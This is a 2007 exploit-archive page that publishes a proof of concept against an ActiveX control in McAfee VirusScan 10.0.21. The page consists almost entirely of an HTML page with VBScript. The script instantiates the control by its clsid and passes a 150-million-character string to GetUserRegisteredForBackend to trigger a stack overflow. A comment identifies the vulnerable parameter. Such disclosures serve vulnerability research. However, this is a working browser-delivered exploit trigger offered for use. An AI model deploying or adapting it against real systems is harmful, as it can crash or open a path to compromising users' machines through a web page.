McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC
# Published : 2007-05-09
# Author : callAX
# Previous Title : BarCodeWiz ActiveX Control 2.0 (BarcodeWiz.dll) Remote BoF PoC
# Next Title : GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC

<html>

<head><title> Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21</title>

</head>

<h4>Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21

http://download.mcafee.com/fr/ author -> callAX

mail -> callax@shellcode.com.ar

Url -> http://www.shellcode.com.ar / http://www.securenetworks.ch</h3>

 

<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='Crash' ></object>

<input type="button" value="CrAsh-m3 No //" language="VBScript" OnClick="CrAsHm3()">

 

<script language="VBScript">

sub CrAsHm3()

 Arg0 = String(150000000,"S")

 Arg1 = String(3000, "x")

 Crash.GetUserRegisteredForBackend Arg0, Arg1

End Sub

 

</script>

</html>

<!--
Bad method -> GetUserRegisteredForBackend

Function GetUserRegisteredForBackend (

            ByVal bstrBackend  As String , <-- Bad Buffer

            ByRef pvarAccountId  As Variant

)
-->

# www.Syue.com [2007-05-09]